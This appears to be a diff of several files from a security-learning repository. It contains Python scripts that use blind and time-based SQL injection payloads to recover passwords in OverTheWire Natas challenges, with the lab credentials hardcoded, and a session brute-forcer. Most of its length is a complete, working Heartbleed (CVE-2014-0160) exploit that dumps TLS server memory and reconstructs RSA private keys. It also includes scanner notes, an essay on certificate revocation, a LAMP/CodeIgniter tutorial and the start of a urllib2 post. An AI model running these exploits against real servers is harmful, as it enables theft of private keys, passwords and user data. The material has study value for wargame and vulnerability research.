AUTH = ('natas15', 'AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option
SQL_URL1 = 'http://natas15.natas.labs.overthewire.org?username=natas16" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
KEYWORD = 'exists'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2, KEYWORD))

View file

@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
import string
def brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2):
password = ''
for i in range(1, LENGTH+1):
for j in range (len(CHARS)):
r = requests.get( ( SQL_URL1 + str(i) + SQL_URL2 + CHARS[j] + SQL_URL3 ), auth=AUTH)
time = r.elapsed.total_seconds()
print("Position %d: trying %s... Time: %.3f" %(i, CHARS[j], time))
#print r.url
if time >= 9:
password += CHARS[j]
print("Password so far: " + password)
break
return password
if __name__ == '__main__':
# authorization: login and password
AUTH = ('natas17', '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw')
# BASE64 password and 32 bytes
CHARS = string.ascii_letters + string.digits
LENGTH = 32
# crafted url option 1
SQL_URL1 = 'http://natas17.natas.labs.overthewire.org?username=natas18" AND SUBSTRING(password,'
SQL_URL2 = ',1) LIKE BINARY "'
SQL_URL3 = '" AND SLEEP(10) AND "1"="1'
print(brute_force_password(LENGTH, AUTH, CHARS, SQL_URL1, SQL_URL2))

View file

@ -0,0 +1,45 @@
#!/usr/bin/python
__author__ = "bt3"
import requests
def brute_force_password(URL, PAYLOAD, MAXID):
for i in range(MAXID):
#HEADER ={'Cookie':'PHPSESSID=' + (str(i) + '-admin').encode('hex')}
r = requests.post(URL, params=PAYLOAD)
print(i)
print r.text
id_hex = requests.utils.dict_from_cookiejar(r.cookies)['PHPSESSID']
print(id_hex.decode('hex'))
if __name__ == '__main__':
#AUTH = ('admin', 'password')
URL = 'http://10.13.37.12/cms/admin/login.php'
PAYLOAD = ({'debug': '1', 'username': 'admin', 'password': 'pass'})
MAXID = 640
brute_force_password(URL, PAYLOAD, MAXID)

View file

@ -0,0 +1,37 @@
## [Nikto](http://sectools.org/tool/nikto/)
* Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software.
* Most scanned vulnerabilities are things such as XSS, phpmyadmin logins,
etc.
* It's coded in Perl.
* It is not a stealthy tool. It will test a web server in the quickest time possible, and it is obvious in log files.
* There is support for LibWhisker's anti-IDS methods.
* To fire it up in a website:
```
$ ./nikto.pl -h <IP> -p <PORT> -output <OUTPUT-FILE>
```
* The output file can be open with *Niktorat*.
## [W3af](http://w3af.org/)
* w3af is a Web Application Attack and Audit Framework. The project's goal is to create a framework to help you secure your web applications by finding and exploiting all web application vulnerabilities.
* It's coded in Python.
* It has plugins that communicate with each other.
* It removes some of the headaches involved in manual web application testing through its Fuzzy and manual request generator feature.
* It can be configured to run as a MITM proxy. The requests intercepted can be sent to the request generator and then manual web application testing can be peperformedsing variables parameters.
* It also has features to exploit the vulnerabilities that it finds. w3af supports detection of both simple and blind OS commanding vulnerability.

View file

@ -0,0 +1,454 @@
#!/usr/bin/python
# Modified by Travis Lee
# Last Updated: 4/21/14
# Version 1.16
#
# -changed output to display text only instead of hexdump and made it easier to read
# -added option to specify number of times to connect to server (to get more data)
# -added option to send STARTTLS command for use with SMTP/POP/IMAP/FTP/etc...
# -added option to specify an input file of multiple hosts, line delimited, with or without a port specified (host:port)
# -added option to have verbose output
# -added capability to automatically check if STARTTLS/STLS/AUTH TLS is supported when smtp/pop/imap/ftp ports are entered and automatically send appropriate command
# -added option for hex output
# -added option to output raw data to a file
# -added option to output ascii data to a file
# -added option to not display returned data on screen (good if doing many iterations and outputting to a file)
# -added tls version auto-detection
# -added an extract rsa private key mode (orig code from epixoip. will exit script when found and enables -d (do not display returned data on screen)
# -requires following modules: gmpy, pyasn1
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
import time
import os
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test and exploit TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-n', '--num', type='int', default=1, help='Number of times to connect/loop (default: 1)')
options.add_option('-s', '--starttls', action="store_true", dest="starttls", help='Issue STARTTLS command for SMTP/POP/IMAP/FTP/etc...')
options.add_option('-f', '--filein', type='str', help='Specify input file, line delimited, IPs or hostnames or IP:port or hostname:port')
options.add_option('-v', '--verbose', action="store_true", dest="verbose", help='Enable verbose output')
options.add_option('-x', '--hexdump', action="store_true", dest="hexdump", help='Enable hex output')
options.add_option('-r', '--rawoutfile', type='str', help='Dump the raw memory contents to a file')
options.add_option('-a', '--asciioutfile', type='str', help='Dump the ascii contents to a file')
options.add_option('-d', '--donotdisplay', action="store_true", dest="donotdisplay", help='Do not display returned data on screen')
options.add_option('-e', '--extractkey', action="store_true", dest="extractkey", help='Attempt to extract RSA Private Key, will exit when found. Choosing this enables -d, do not display returned data on screen.')
opts, args = options.parse_args()
if opts.extractkey:
import base64, gmpy
from pyasn1.codec.der import encoder
from pyasn1.type.univ import *
def hex2bin(arr):
return ''.join('{:02x}'.format(x) for x in arr).decode('hex')
tls_versions = {0x01:'TLSv1.0',0x02:'TLSv1.1',0x03:'TLSv1.2'}
def build_client_hello(tls_ver):
client_hello = [
# TLS header ( 5 bytes)
0x16, # Content type (0x16 for handshake)
0x03, tls_ver, # TLS Version
0x00, 0xdc, # Length
# Handshake header
0x01, # Type (0x01 for ClientHello)
0x00, 0x00, 0xd8, # Length
0x03, tls_ver, # TLS Version
# Random (32 byte)
0x53, 0x43, 0x5b, 0x90, 0x9d, 0x9b, 0x72, 0x0b,
0xbc, 0x0c, 0xbc, 0x2b, 0x92, 0xa8, 0x48, 0x97,
0xcf, 0xbd, 0x39, 0x04, 0xcc, 0x16, 0x0a, 0x85,
0x03, 0x90, 0x9f, 0x77, 0x04, 0x33, 0xd4, 0xde,
0x00, # Session ID length
0x00, 0x66, # Cipher suites length
# Cipher suites (51 suites)
0xc0, 0x14, 0xc0, 0x0a, 0xc0, 0x22, 0xc0, 0x21,
0x00, 0x39, 0x00, 0x38, 0x00, 0x88, 0x00, 0x87,
0xc0, 0x0f, 0xc0, 0x05, 0x00, 0x35, 0x00, 0x84,
0xc0, 0x12, 0xc0, 0x08, 0xc0, 0x1c, 0xc0, 0x1b,
0x00, 0x16, 0x00, 0x13, 0xc0, 0x0d, 0xc0, 0x03,
0x00, 0x0a, 0xc0, 0x13, 0xc0, 0x09, 0xc0, 0x1f,
0xc0, 0x1e, 0x00, 0x33, 0x00, 0x32, 0x00, 0x9a,
0x00, 0x99, 0x00, 0x45, 0x00, 0x44, 0xc0, 0x0e,
0xc0, 0x04, 0x00, 0x2f, 0x00, 0x96, 0x00, 0x41,
0xc0, 0x11, 0xc0, 0x07, 0xc0, 0x0c, 0xc0, 0x02,
0x00, 0x05, 0x00, 0x04, 0x00, 0x15, 0x00, 0x12,
0x00, 0x09, 0x00, 0x14, 0x00, 0x11, 0x00, 0x08,
0x00, 0x06, 0x00, 0x03, 0x00, 0xff,
0x01, # Compression methods length
0x00, # Compression method (0x00 for NULL)
0x00, 0x49, # Extensions length
# Extension: ec_point_formats
0x00, 0x0b, 0x00, 0x04, 0x03, 0x00, 0x01, 0x02,
# Extension: elliptic_curves
0x00, 0x0a, 0x00, 0x34, 0x00, 0x32, 0x00, 0x0e,
0x00, 0x0d, 0x00, 0x19, 0x00, 0x0b, 0x00, 0x0c,
0x00, 0x18, 0x00, 0x09, 0x00, 0x0a, 0x00, 0x16,
0x00, 0x17, 0x00, 0x08, 0x00, 0x06, 0x00, 0x07,
0x00, 0x14, 0x00, 0x15, 0x00, 0x04, 0x00, 0x05,
0x00, 0x12, 0x00, 0x13, 0x00, 0x01, 0x00, 0x02,
0x00, 0x03, 0x00, 0x0f, 0x00, 0x10, 0x00, 0x11,
# Extension: SessionTicket TLS
0x00, 0x23, 0x00, 0x00,
# Extension: Heartbeat
0x00, 0x0f, 0x00, 0x01, 0x01
]
return client_hello
def build_heartbeat(tls_ver):
heartbeat = [
0x18, # Content Type (Heartbeat)
0x03, tls_ver, # TLS version
0x00, 0x03, # Length
# Payload
0x01, # Type (Request)
0x40, 0x00 # Payload length
]
return heartbeat
if opts.rawoutfile:
rawfileOUT = open(opts.rawoutfile, "a")
if opts.asciioutfile:
asciifileOUT = open(opts.asciioutfile, "a")
if opts.extractkey:
opts.donotdisplay = True
def hexdump(s):
pdat = ''
hexd = ''
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
if opts.hexdump:
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
hexd += ' %04x: %-48s %s\n' % (b, hxdat, pdat)
else:
pdat += ''.join((c if ((32 <= ord(c) <= 126) or (ord(c) == 10) or (ord(c) == 13)) else '.' )for c in lin)
if opts.hexdump:
return hexd
else:
pdat = re.sub(r'([.]{50,})', '', pdat)
if opts.asciioutfile:
asciifileOUT.write(pdat)
return pdat
def rcv_tls_record(s):
try:
tls_header = s.recv(5)
if not tls_header:
print 'Unexpected EOF (header)'
return None,None,None
typ,ver,length = struct.unpack('>BHH',tls_header)
message = ''
while len(message) != length:
message += s.recv(length-len(message))
if not message:
print 'Unexpected EOF (message)'
return None,None,None
if opts.verbose:
print 'Received message: type = {}, version = {}, length = {}'.format(typ,hex(ver),length,)
return typ,ver,message
except Exception as e:
print "\nError Receiving Record! " + str(e)
return None,None,None
def hit_hb(s, targ, firstrun, supported):
s.send(hex2bin(build_heartbeat(supported)))
while True:
typ, ver, pay = rcv_tls_record(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return ''
if typ == 24:
if opts.verbose:
print 'Received heartbeat response...'
if len(pay) > 3:
if firstrun or opts.verbose:
print '\nWARNING: ' + targ + ':' + str(opts.port) + ' returned more data than it should - server is vulnerable!'
if opts.rawoutfile:
rawfileOUT.write(pay)
if opts.extractkey:
return pay
else:
return hexdump(pay)
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
if typ == 21:
print 'Received alert:'
return hexdump(pay)
print 'Server returned error, likely not vulnerable'
return ''
def conn(targ, port):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sys.stdout.flush()
s.settimeout(10)
#time.sleep(0.2)
s.connect((targ, port))
return s
except Exception as e:
print "Connection Error! " + str(e)
return None
def bleed(targ, port):
try:
res = ''
firstrun = True
print '\n##################################################################'
print 'Connecting to: ' + targ + ':' + str(port) + ', ' + str(opts.num) + ' times'
for x in range(0, opts.num):
if x > 0:
firstrun = False
if x == 0 and opts.extractkey:
print "Attempting to extract private key from returned data..."
if not os.path.exists('./hb-certs'):
os.makedirs('./hb-certs')
print '\nGrabbing public cert from: ' + targ + ':' + str(port) + '\n'
os.system('echo | openssl s_client -connect ' + targ + ':' + str(port) + ' -showcerts | openssl x509 > hb-certs/sslcert_' + targ + '.pem')
print '\nExtracting modulus from cert...\n'
os.system('openssl x509 -pubkey -noout -in hb-certs/sslcert_' + targ + '.pem > hb-certs/sslcert_' + targ + '_pubkey.pem')
output = os.popen('openssl x509 -in hb-certs/sslcert_' + targ + '.pem -modulus -noout | cut -d= -f2')
modulus = output.read()
s = conn(targ, port)
if not s:
continue
# send starttls command if specified as an option or if common smtp/pop3/imap ports are used
if (opts.starttls) or (port in {25, 587, 110, 143, 21}):
stls = False
atls = False
# check if smtp supports starttls/stls
if port in {25, 587}:
print 'SMTP Port... Checking for STARTTLS Capability...'
check = s.recv(1024)
s.send("EHLO someone.org\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "STLS" in check:
opts.starttls = True
stls = True
print "STLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# check if pop3/imap supports starttls/stls
elif port in {110, 143}:
print 'POP3/IMAP4 Port... Checking for STARTTLS Capability...'
check = s.recv(1024)
if port == 110:
s.send("CAPA\n")
if port == 143:
s.send("CAPABILITY\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "STLS" in check:
opts.starttls = True
stls = True
print "STLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# check if ftp supports auth tls/starttls
elif port in {21}:
print 'FTP Port... Checking for AUTH TLS Capability...'
check = s.recv(1024)
s.send("FEAT\n")
sys.stdout.flush()
check += s.recv(1024)
if opts.verbose:
print check
if "STARTTLS" in check:
opts.starttls = True
print "STARTTLS command found"
elif "AUTH TLS" in check:
opts.starttls = True
atls = True
print "AUTH TLS command found"
else:
print "STARTTLS command NOT found!"
print '##################################################################'
return
# send appropriate tls command if supported
if opts.starttls:
sys.stdout.flush()
if stls:
print 'Sending STLS Command...'
s.send("STLS\n")
elif atls:
print 'Sending AUTH TLS Command...'
s.send("AUTH TLS\n")
else:
print 'Sending STARTTLS Command...'
s.send("STARTTLS\n")
if opts.verbose:
print 'Waiting for reply...'
sys.stdout.flush()
rcv_tls_record(s)
supported = False
for num,tlsver in tls_versions.items():
if firstrun:
print 'Sending Client Hello for {}'.format(tlsver)
s.send(hex2bin(build_client_hello(num)))
if opts.verbose:
print 'Waiting for Server Hello...'
while True:
typ,ver,message = rcv_tls_record(s)
if not typ:
if opts.verbose:
print 'Server closed connection without sending ServerHello for {}'.format(tlsver)
s.close()
s = conn(targ, port)
break
if typ == 22 and ord(message[0]) == 0x0E:
if firstrun:
print 'Received Server Hello for {}'.format(tlsver)
supported = True
break
if supported: break
if not supported:
print '\nError! No TLS versions supported!'
print '##################################################################'
return
if opts.verbose:
print '\nSending heartbeat request...'
sys.stdout.flush()
keyfound = False
if opts.extractkey:
res = hit_hb(s, targ, firstrun, supported)
if res == '':
continue
keyfound = extractkey(targ, res, modulus)
else:
res += hit_hb(s, targ, firstrun, supported)
s.close()
if keyfound:
sys.exit(0)
else:
sys.stdout.write('\rPlease wait... connection attempt ' + str(x+1) + ' of ' + str(opts.num))
sys.stdout.flush()
print '\n##################################################################'
print
return res
except Exception as e:
print "Error! " + str(e)
print '##################################################################'
print
def extractkey(host, chunk, modulus):
#print "\nChecking for private key...\n"
n = int (modulus, 16)
keysize = n.bit_length() / 16
for offset in xrange (0, len (chunk) - keysize):
p = long (''.join (["%02x" % ord (chunk[x]) for x in xrange (offset + keysize - 1, offset - 1, -1)]).strip(), 16)
if gmpy.is_prime (p) and p != n and n % p == 0:
if opts.verbose:
print '\n\nFound prime: ' + str(p)
e = 65537
q = n / p
phi = (p - 1) * (q - 1)
d = gmpy.invert (e, phi)
dp = d % (p - 1)
dq = d % (q - 1)
qinv = gmpy.invert (q, p)
seq = Sequence()
for x in [0, n, e, d, p, q, dp, dq, qinv]:
seq.setComponentByPosition (len (seq), Integer (x))
print "\n\n-----BEGIN RSA PRIVATE KEY-----\n%s-----END RSA PRIVATE KEY-----\n\n" % base64.encodestring(encoder.encode (seq))
privkeydump = open("hb-certs/privkey_" + host + ".dmp", "a")
privkeydump.write(chunk)
return True
else:
return False
def main():
print "\ndefribulator v1.16"
print "A tool to test and exploit the TLS heartbeat vulnerability aka heartbleed (CVE-2014-0160)"
allresults = ''
# if a file is specified, loop through file
if opts.filein:
fileIN = open(opts.filein, "r")
for line in fileIN:
targetinfo = line.strip().split(":")
if len(targetinfo) > 1:
allresults = bleed(targetinfo[0], int(targetinfo[1]))
else:
allresults = bleed(targetinfo[0], opts.port)
if allresults and (not opts.donotdisplay):
print '%s' % (allresults)
fileIN.close()
else:
if len(args) < 1:
options.print_help()
return
allresults = bleed(args[0], opts.port)
if allresults and (not opts.donotdisplay):
print '%s' % (allresults)
print
if opts.rawoutfile:
rawfileOUT.close()
if opts.asciioutfile:
asciifileOUT.close()
if __name__ == '__main__':
main()

View file

@ -0,0 +1,123 @@
# On CRLs, OCSP, and a Short Review of Why Revocation Checking Doesn't Work (for Browsers)
A guide about regulation details of **SSL/TLS connections**. These connections rely on a chain of trust. This chain of trust is established by **certificate authorities** (CAs), which serve as trust anchors to verify the validity of who a device thinks it is talking to. In technical terms, **X.509** is an [ITU-T](http://en.wikipedia.org/wiki/ITU-T) standard that specifies standard formats for things such as *public key certificates* and *certificate revocation lists*.
A **public key certificate** is how websites bind their identity to a *public key* to allow an encrypted session (SSL/TLS) with the user. The certificate includes information about the key, the owner's *identity* (such as the DNS name), and the *digital signature* of the entity that issued the certificate (the [Certificate Authority](http://en.wikipedia.org/wiki/Certificate_authority), also known as CA). As a consequence, browsers and other [user-agents](http://en.wikipedia.org/wiki/User_agent) should always be able to check the authenticity of these certificates before proceeding.
Some organizations need SSL/TLS simply for confidentiality (encryption), while other organizations use it to enhance trust in their security and identity. Therefore, CAs issue different certificates with different levels of verification, ranging from just confirming the control of the domain name (*Domain Validation*, DV) to more extensive identity checks (*Extended Validation*, EV). For instance, if a site's DNS gets hijacked, while the attacker could be able to issue a controlled DV, she wouldn't be able to issue new EV certificates just with domain validation.
Since EV and DV certificates can be valid for years, they might lose their validity before they expire by age. For instance, the website can lose control of its key or, as recently in the event of the [Heartbleed bug](http://heartbleed.com/), a very large number of SSL/TLS websites needed to revoke and reissue their certificates. Therefore, the need for efficient revocation machinery is evident.
For many years, two ways of revoking a certificate have prevailed:
* by checking a **Certificate Revocation Lists** (CRLs), which are lists of serial numbers of certificates that have been revoked, provided by *each CA*. As one can imagine, they can become quite large.
* by a communication protocol named **Online Certificate Status Protocol** (OCSP), which allows a system to check with a CA for the status of a single certificate without pulling the entire CRL.
While CRLs are long lists and OCSP only deals with a single certificate, they are both methods of getting signed statements about the status of a certificate; and they both present issues concerning privacy, integrity, and availability. In this post, I discuss some of these issues and I review possible alternatives.
----
## Broken Models
### Certificate Revocation Lists (CRLs)
A CRL is a list of serial numbers (such as ```54:99:05:bd:ca:2a:ad:e3:82:21:95:d6:aa:ee:b6:5a```) of unexpired security certificates which have been revoked by their issuer and should not be trusted.
Each CA maintains and publishes its own CRL. CRLs are in continuous changes: old certificates expire due to their age and serial numbers of newly revoked certificates are added.
The main issue here is that the original *public key infrastructure* (PKI) scheme does not scale. Users all over the Internet are constantly checking for revocation and having to download files that can be many MB. In addition, although CRL can be cached, they are still very volatile, turning CAs into a major performance bottleneck on the Internet.
### Online Certificate Status Protocol (OCSP)
[OCSP was intended to replace the CRL system](https://tools.ietf.org/html/rfc2560), however, it presented several issues:
* *Reliability*: Every time any user connects to any secured website, her browser must query the CA's OCSP server. The typical CA issues certificates for hundreds of thousands of individual websites and the checks can be up to seconds. Also, the CA's OCSP server might experience downtime! If a server is offline, overloaded, under attack, or unable to reply for any reason, certificate validity cannot be confirmed.
* *Privacy*: CAs can learn the IP address of users and which websites they wish to securely visit.
* *Security*: Browsers cannot be sure that a CA's server is reachable (*e.g.*, captive portals that require one to sign in on an HTTPS site, but blocks traffic to all other sites, including CA's OCSP servers).
One attempt to circumvent the lack of assurance of a server's reliability was issuing OCSP checks with a **soft-fail** option. In this case, online revocation checks which result in a *network error would be ignored*.
This brings serious issues. A simple example is when an [attacker can intercept HTTPS traffic and make online revocation checks appear to fail, bypassing OCSP checks](http://www.thoughtcrime.org/papers/ocsp-attack.pdf).
On the flip side, it's also not a good idea to enforce a **hard-fail** check: OCSP servers are pretty flaky/slow and you do not want to rely on their capabilities (DDoS attackers would love this though).
----
## Some Light in a Solution
There are several attempts of a solution for the revocation problem but none of them has been regarded as the definitive one. Here some of them:
### CRLSets
Google Chrome uses [**CRLSets**](https://dev.chromium.org/Home/chromium-security/crlsets) in its update mechanism to send lists of serial numbers of revoked certificates which are constantly added by crawling the CAs.
This method brings more performance and reliability to the browser and, in addition, [CRLSet updates occur at least daily](https://www.imperialviolet.org/2014/04/19/revchecking.html), which is faster than most OCSP validity periods.
A complementary initiative from Google is the [Certificate Transparency](http://www.certificate-transparency.org/what-is-ct) project. The objective is to help with structural flaws in the SSL certificate system such as domain validation, end-to-end encryption, and the chains of trust set up by CAs.
### OCSP stapling
**OCSP Stapling** ([TLS Certificate Status Request extension](http://tools.ietf.org/html/draft-hallambaker-tlssecuritypolicy-03)) is an alternative approach for checking the revocation status of certificates. It allows the presenter of a certificate to bear the resource cost involved in providing OCSP responses, instead of the CA, in a fashion reminiscent of the [Kerberos Ticket](http://en.wikipedia.org/wiki/Kerberos_(protocol)).
In a simple example, the certificate holder is the one who periodically queries the OCSP server, obtaining a *signed time-stamped OCSP response*. When users attempt to connect to the website, the response is signed with the SSL/TLS handshake via the Certificate Status Request extension response. Since the stapled response is signed by the CA, it cannot be forged (without the CA's signing key).
If the stapled OCSP has the [Must Staple](http://tools.ietf.org/html/draft-hallambaker-muststaple-00) capability, it becomes hard-fail if a valid OCSP response is not stapled. To make a browser know this option, one can add a "must staple" assertion to the site's security certificate and/or create a new HTTP response header similar to [HSTS](http://en.wikipedia.org/wiki/HTTP_Strict_Transport_Security).
Some fixable issue is that OCSP stapling supports only one response at a time. This is insufficient for sites that use several different certificates for a single page. Nevertheless, OCSP stapling is the most promising solution for the problem for now. The idea has been implemented by the servers for years, and recently, a [few browsers are adopting it](https://blog.mozilla.org/security/2013/07/29/ocsp-stapling-in-firefox/). If this solution is going to become mainstream, only time will show.
-----
**tl;dr:** The security of the Internet depends on the agent's ability to revoke compromised certificates, but the status quo is broken. There is a urgent need for rethinking the way things have been done!
-----
**Edited, 11/19/2014:** The **EFF** just announced an attempt to help the CA problem: [Let's Encrypt](https://www.eff.org/deeplinks/2014/11/certificate-authority-encrypt-entire-web), "a new certificate authority (CA) initiative that aims to clear the remaining roadblocks to transition the Web from HTTP to HTTPS". The initiative is planned to be released in 2015. These are good news, but it is still not clear whether they are going to address the revocation problem with new solutions.
----
### References:
[Imperial Violet: Revocation Doesn't work](https://www.imperialviolet.org/2011/03/18/revocation.html)
[Imperial Violet: Don't Enable Revocation Checking](https://www.imperialviolet.org/2014/04/19/revchecking.html)
[Imperial Violet: Revocation Still Doesn't Work](https://www.imperialviolet.org/2014/04/29/revocationagain.html)
[Proxy server for testing revocation](https://gist.github.com/agl/876829)
[Revocation checking and Chrome's CRL](https://www.imperialviolet.org/2012/02/05/crlsets.html)
[Discussion about OCSP checking at Chrome](https://code.google.com/p/chromium/issues/detail?id=361820)
[RFC Transport Layer Security (TLS) Channel IDs](http://tools.ietf.org/html/draft-balfanz-tls-channelid-00)
[Fixing Revocation for Web Browsers, iSEC Partners](https://www.isecpartners.com/media/17919/revocation-whitepaper_pdf__2_.pdf)
[Proposal for Better Revocation Model of SSL Certificates](https://wiki.mozilla.org/images/e/e3/SSLcertRevocation.pdf)
[SSL Server Test](https://www.ssllabs.com/ssltest/)
[SSL Certificate Checker](https://www.digicert.com/help/)

View file

@ -0,0 +1,260 @@
# Getting started with LAMP and CodeIgniter
LAMP is an acronym for a model of web service solution stacks: Linux, the Apache HTTP Server, the MySQL relational database management system, and the PHP programming language.
## Building a MySQL Database
We will use a web interface to access data in our database:
* Login with your root login/password (set in the installation above): ```http://localhost/phpmyadmin```.
The left-hand column contains a list of all of the databases you currently have.
- mysql: contains information about the MySQL database server.
- information_schema: contains information about all of the other databases on your computer.
* In the Databases interface you are presented with a list of all of the databases.
* Above that list there should be a form labeled “Create new database” with a text field.
* Create tables within. Chose the types of your data. Every table should always have an id column (auto-incrementing integer, meaning that each new record will be automatically assigned an id value, starting at 1). You can do this by selecting A_I checkbox.
* Add some data (using insert). The database is located at
```/var/lib/mysql```.
### MySQL Query Basis
Selecting items:
```
Retrieve all of the records (* means columns):
SELECT * FROM db_name;
Select only some columns:
SELECT col1, col2 FROM db_name;
Select only some values from some column:
SELECT * FROM db_name WHERE col1 = 'item';
Select the first 10 items:
SELECT * FROM cars WHERE make = 'Porsche' LIMIT 10
```
Inserting an item:
```
INSERT INTO db_name (col1, col2, col3) VALUES ('item1', 'item2', 'item3')
```
Updating an item:
```
UPDATE db_name SET col1 = 'item' WHERE col2 = 'item2' AND col3='item3'
```
Deleting items:
```
DELETE db_name WHERE col1 = item"
```
## PHP Basics
Variables:
```
<? php
$result = 4*8;
?>
Comments with / or ./* */.
Print function:
<? php
echo "that's a print";
?>
```
Functions:
```
<? php
function print_this($name){
echo 'Print this ' . $name . '.';
return 'nice printing';
}
extra_print = print_this('aaaaa');
print(extra_print);
?>
```
When a PHP file is accessed, all of its functions are initialized before any of the other lines of code are executed. As long as a function is defined in the same file, it can be called from anywhere within that file.
The scope of a variable refers to the domain within which it can be referenced. In PHP, any variables initialized and contained within a function itself are only available within that function.
### Arrays
Creating an empty array:
```
<? php $new_array = array(); ?>
```
Adding elements:
```
<? php $new_array[] = 1; $new_array[] = 5; ?>
```
Creating an array with values already:
```
<? php $other_array = array(1,2,3); ?>
```
In PHP, arrays are like dictionaries:. If you add item likes above, it will increment from 0. You can also give the key:
```
<? php $dictionary['dog'] = 1; ?> echo $dictionary['dog'];
```
Multi-arrays:
```
$cars = array
(
array("Volvo",22,18),
array("BMW",15,13),
array("Saab",5,2),
array("Land Rover",17,15)
);
```
Loop foreach:
```
<? php
foreach ($array_number as $variable_representing_current_item){
}
?>
```
Loop for:
```
<?
$other_array = []
for ($i; $i<4; $i++){
$other_array[] = $i;
} ?>
```
## The Model-View-Controller Pattern (MVC)
In a high level, the flow of a web app is:
* User request to view a certain page by typing a URL in the browser.
* The app determines what needs to be displayed.
* The data required for the page is requested and retrieved from the database.
* The resulting data is used to render the page's display to the user.
* The MVC structure is based on the presence of 3 main components: models, views, and controllers.
### Models: Representing the Data Object
Responsible for communicating with the database. Composed of two parts:
* fields: Responsible for representing the various pieces of data within an object (the information within the database).
* methods: Provide extra functionality within our models. Allow the manipulation of the model's initial information or perform additional actions related to the data.
### Controllers: Workhorses
Determine what objects to retrieve and how to organize them.
Handle user request, retrieve proper information, and pass it to the proper view.
Different request is handled by different controller actions.
### Views: What the User Sees
Responsible for the presentation layer, the actual visual display.
Each individual page within a web app has its own view.
Views contain HTML code and PHP (if this is the backend language) to inject objects' information, passed to the view via a controller.
A simplified version of Facebook profile view:
```
<section id="personal_info"> <?php // some code ?> </section> <section id="photos"> <?php // some code ?> </section>
```
## Frameworks
The basis/foundation of your web app.
For PHP, we can download CodeIgniter, rename to our project name, copy it to the /var/www folder, and open it in the localhost/folder. We can modify the files for our app now.
If you get the 403 forbidden error, check the permissions and then type:
```
restorecon -r /var/www/html
```
(restorecon is used to reset the security context (type) (extended attributes) on one or more files).
The user guide can be seen at
```http://localhost/APP_NAME/user_guide/```
### CodeIgniter Basics
The system folder contains all of the inner-working.
The application folder is where all the code specific to our app will live, include models, controllers, and view.
Controllers (```application/controllers/welcome.php```)
The welcome class is inherent from the CI_Controller class.
An index refers to a main/default location.
The index action is responsible for loading the view that renders the welcome message:
public function index() { $this->load->view('welcome_message'); }
In the case of controllers, each action is frequently associated with a URL.
The ```'welcomemessage'``` view is at ```applications/views/welcomemessage.php```.
### Routes
The way that our web app knows where to direct our users, based on the URLs they enter, is by establishing routes. Routes are a mapping between URLs and specific controller actions.
We can configure routes at ```application/config/routes.php```:
```
$route['desired-url-fragment'] = "controller-name/action-name”;
```
Some routes work automatically: you can reference any controller action using the following URL format:
```http://localhost/APP_NAME/index.php/[controller-name]/[action-name]```
For example:
```http://localhost/APP_NAME/index.php/welcome/index/```
### Configuring our app to use the Database
CI has built-in support for interacting with a database.
In our application, the database configuration file is store at application/config/database.php
To connect our app to the MySQL database, update this file to:
```
$db['default']['hostname'] = 'localhost';
$db['default']['username'] = 'root';
$db['default']['password'] = '<your-root-password>';
$db['default']['database'] = '<database-name-from-before';
```
To have access to the database functionality throughout the entire web app, auto-load the database library by changing the file ```application/config/autoload.php``` with:
```
$autoload['libraries'] = array('template', 'database'); $autoload['libraries'] = array('database');
Check if the page is still working fine
($autoload['libraries'] = array('template', 'database'); does not work yet).
```
### Models
Each model starts the same, as they intend to serve the same general function.
We create a new file in application/models folder named todomodel.php with the code:
```
<?php if ( ! defined('BASEPATH')) exit('No direct script access allowed');
class Todomodel extends CIModel {
function _construct() {
parent::_construct();
}
```
The second responsibility of models is to interact with our database. We need to implement a way for our todomodel to retrieve all of the todos in our database. We add a getallentries function bellow the constructor:
```
function get_all_entries() { //$query = $this->db->get('todos'); $query = $this->db->order_by('order','ASC')->get('todos'); $results = array(); foreach ($query->result() as $result) { $results[] = $result; } return $results; }
```
In this snippet, we query our database by order, using ascending order.
---
Enjoy! This article was originally posted [here](https://coderwall.com/p/5ltrxq/lamp-and-codeigniter).

View file

@ -0,0 +1,541 @@
# Hacking the Web with Python's urllib2 (by bt3)
Python's [urllib2](https://docs.python.org/2/library/urllib2.html) library is **the tool** to interact with web services, with several functions and classes to help handling URLs. **urllib2** is written in the top of [httplib](https://docs.python.org/2/library/httplib.html) library (which defines classes to implement the client side of HTTP and HTTPs). In turn, **httplib** uses the [socket](http://https://singularity-sh.vercel.app/black-hat-python-networking-the-socket-module.html) library.
In this post I [introduce urllib2](#intro) and then I work on two problems: [mapping webapps from their installation files](#map) and [brute-forcing the contents of webapps to find hidden resources](#brute1).
-----
## <a name="intro"></a>urllib2 101
